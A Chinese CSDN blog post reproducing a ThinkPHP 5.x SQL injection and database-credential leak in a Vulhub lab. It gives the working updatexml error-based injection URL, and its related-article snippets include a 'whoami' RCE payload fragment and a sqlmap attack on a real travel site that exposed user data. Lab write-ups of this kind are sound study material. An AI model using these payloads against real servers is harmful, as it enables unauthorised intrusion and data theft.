Vulhub漏洞复现之ThinkPHP5.X SQL注入漏洞和敏感信息泄露漏洞

最新推荐文章于 2024-08-12 00:16:51 发布
最新推荐文章于 2024-08-12 00:16:51 发布
阅读量3.3k 收藏 2
点赞数 2
分类专栏: 复现漏洞 文章标签: vulhub 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41598660/article/details/104063002
版权
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。
前文:

名字雷同但差个n的两种类型漏洞环境靶机:vulnhub与vulhub的区别

Vulhub漏洞复现之Dns域传送漏洞

Vulhub漏洞复现之Django (小于2.0.8)任意url跳转漏洞(CVE-2018-14574)

漏洞影响:

<5.0.9
该漏洞形成最关键的一点是需要开启debug模式

漏洞复现:

vulhub目录cd vulhub/phpmyadmin/CVE-2018-12613#
对靶场进行编译:docker-compose build
运行靶场:docker-compose up -d
在这里插入图片描述
启动后,访问http://your-ip/index.php?ids[]=1&ids[]=2,即可看到用户名被显示了出
来,说明环境运行成功打开页面,插入sql报错注入语句
http://your-ip/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1,您将发现成功显示的消息:
在这里插入图片描述
在这里插入图片描述
值得一提的是这种数据库账户和密码泄漏的前提是SQL语句执行失败或者发生异常的时候才会出现。如果非SQL语法错误的debug模式下是不会泄漏数据库账户和密码的。

参考资料:
https://forum.90sec.com/t/topic/407
https://www.freebuf.com/column/205976.html

努力的学渣'#
关注
专栏目录
[ vulhub漏洞复现篇 ] Thinkphp SQL注入 && 敏感信息泄露
qq_51577576的博客
09-29 1701
[ vulhub漏洞复现篇 ] Thinkphp SQL注入 && 敏感信息泄露 ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。 Thinkphp5X设计缺陷导致泄漏数据库账户密码
漏洞复现ThinkPHP 2.x/5.0.x/5.1.x/5 in-sqlinjection 命令执行漏洞
weixin_45556536的博客
11-24 1497
Thinkphp—2-rce一级目录二级目录三级目录涉及版本漏洞复现2-rce 一级目录 二级目录 三级目录 涉及版本 5.0.8-5.0.13 不需要开启debug // payload POST /tp5010/public/index.php?s=index/index/index HTTP/1.1 Host: 127.0.0.1:8000 Content-Length: 52 Content-Type: application/x-www-form-urlencoded s=whoami&a
ThinkPHP5 SQL注入漏洞&&敏感信息泄露漏洞
weixin_45653478的博客
04-27 823
ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5.0(<5.1.23)中,开启debug模式,传入的某参数在绑定编译指令的时候又没有安全处理,预编译的时候导致SQL异常报错。然而thinkphp5默认开启debug模式,在漏洞环境下构造错误的SQL语法会泄漏数据库账户和密码。
thinkphp3 与thinkphp5 日志信息泄露检测脚本.zip
02-20
thinkphp3 与thinkphp5 日志信息泄露检测脚本,亲测有效可用,如有侵权,请联系CSDN管理员删除即可
thinkphp5漏洞sql注入
最新发布
m0_69656902的博客
08-12 211
查看后我们得知新版本进行了一个安全更新,所以是存在漏洞的,接下来我们就要根据版本更新后的补丁确定漏洞的位置。因为要先进行数据库的连接,在进入到insert中,所以我们退出来就能进入到insert方法中。但我们要看的是Builder,所以我们进入Builder中的insert。因为是parseData在处理数据,所以我们要进入parseData中。查询结果都是使用了拼接的方法,所以可能是在此处出现了问题。向下查看内容找到先前的补丁内容发现缺少内容,确定漏洞在此。查看版本更新后提交的信息,发现其修改的。
复现Thinkphp5.X设计缺陷导致泄漏数据库账户密码”
KEY0NE的个人博客
07-25 1895
原文见:Thinkphp5.X设计缺陷导致泄漏数据库账户密码本文只对复现漏洞所遇到的问题做个记录,方便想要复现漏洞的朋友们。对漏洞的分析,作者已经在原文中详细阐述了,在此不再赘述。实验环境:Apache+php5.5+php.ini开启PDO程序包下载:http://www.jb51.net/codes/10793.html实验过程修改文件:ThinkPHP_5....
Thinkphp5.X 设计缺陷导致泄漏数据库账户密码
Fly_鹏程万里
12-11 9571
0x00 框架运行环境 ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。 PDO查询能阻止大多数传参攻击,而且框架要求的php版本是5.4;这就防止了php在5.3.6下有个PDO本地查询造成SQL注入漏洞。...
vulhub thinkPHP5 SQL注入&&敏感信息泄露漏洞复现
weixin_53696027的博客
05-22 755
关于vulhubthinkPHP SQL注入漏洞复现及其简单的原理介绍
Thinkphp漏洞复现
qq_63980959的博客
05-19 855
其 5.0.23 以前的版本中,获取 method 的方法中没有正确处理方法名,导致攻击者可以调用 Request 类任意方法并构造利用链,从而导致远程代码执行漏洞。在其版本 5 中,由于框架处理控制器名称不正确,如果网站未启用强制路由(这是默认设置),它可以执行任何方法,从而导致 RCE 漏洞。传入的某参数在绑定编译指令的时候又没有安全处理,预编译的时候导致SQL异常报错。
ThinkPHP3.2.X SQL注入漏洞的解决方案
amaoatao的博客
03-09 3546
程序部分 1.入口文件加入SQL关键字过滤(立刻要做), API的有多维数据的需要注意 2.任何密码要有等级检测, 密码位数提高到8位以上 3.纯数字的支付密码也要有安全检测, 如’123456’的密码将不能通过 4.登录/支付密码连续错误5次账号暂停24小时(后台参数可设置) 5.密码要先在本地加密(SHA1) 6.涉及API接口对接的项目全部使用AES加密(每个项目最好使用不同的密...
thinkphp 一键漏洞检测
12-09
thinkphp 一键漏洞检测,V3.2.0~V5.1.23,都可进行测试
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
thinkphp5.0.24.zip
10-26
thinkphp5.0.24版本 直接解压覆盖对应目录即可
ThinkPHP5 SQL注入漏洞 && 敏感信息泄露
EC_Carrot的博客
08-17 741
漏洞复现 我们访问http://your-ip/index.php?ids[]=1&ids[]=2即可看到用户都没列举出来了存在该漏洞: 访问http://your-ip/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1,可以看到爆出了许多信息: 更多的利用方法还是自行寻找来的方便,在该环境中报错信息里面还包含了数据库的账户密码: ...
ThinkPHP5 SQL注入漏洞 && 敏感信息泄露 漏洞复现
ADummy的博客
02-20 1777
ThinkPHP5 SQL注入漏洞 && 敏感信息泄露 by ADummy 0x00利用路线 ​ url直接注入—>有回显 0x01漏洞介绍 ​ ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5.0(<5.1.23)中,开启debug模式,传入的某参数在绑定编译指令的时候又没有安全处理,预编译的时候导致SQL异常报错。然而thinkphp5默认开启debug模式,在漏洞环境下构造错误的SQL语法会泄漏数据库账户和密码 0x02漏洞复现 payload: h
ThinkPHP漏洞详解(自学)
m0_64481831的博客
03-01 2960
Thinkphp是一个快速、兼容而且简单的轻量级PHP开发框架。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP 5.0以上版本,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,是一款跨平台,跨版本以及简单易用的PHP框架。Thinkphp发展至今,主要有2.x、3.x、5.x、6.x系列,其中2.x和3.x系列官方已停止维护,5.x系列是目前使用最多的一个系列,而3.x系列比较多的老用户。
某旅游网站sql注入导致泄露2万多个人信息
夏日 の blog
05-25 1076
个人博客文章链接:点我查看 说明 测试目标是一个旅游网站,发现了sql注入漏洞泄露2万多用户信息,可任意下载服务器上文件。 所有可利用信息均打码处理。 渗透过程 正常搜索没啥问题 但是当我们输入1’就会报错 尝试注释闭合,发现失败 尝试不注释闭合后面的 后来多次尝试找到了问题所在 当我们把空格替换为/**/发现搜到了内容 直接上sqlmap sqlmap -u "http://xxxxxx/search/cloudsearch?keyword=1&typeid=0" --level 3.
卧槽,SQL注入竟然把我们的系统搞挂了!
码农翻身
02-21 1536
前言先来给大家看个漫画,原创是xkcd,我把它翻译成了中文。如果你能在看漫画的时候能会心一笑,基本上就理解什么是SQL注入了,这里再啰嗦两句, 来个更简单的例子, 例如这个SQL做了字符...
ThinkPHP v3.2.x SQL注入与文件读取反序列化POP链解析
"ThinkPHP v3.2.X版本中的SQL注入与文件读取漏洞通过反序列化POP链进行利用的详细分析" 在ThinkPHP v3.2.*版本中,存在SQL注入和文件读取的安全漏洞,主要是由于框架对对象反序列化过程中的不安全操作引起的。这些...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值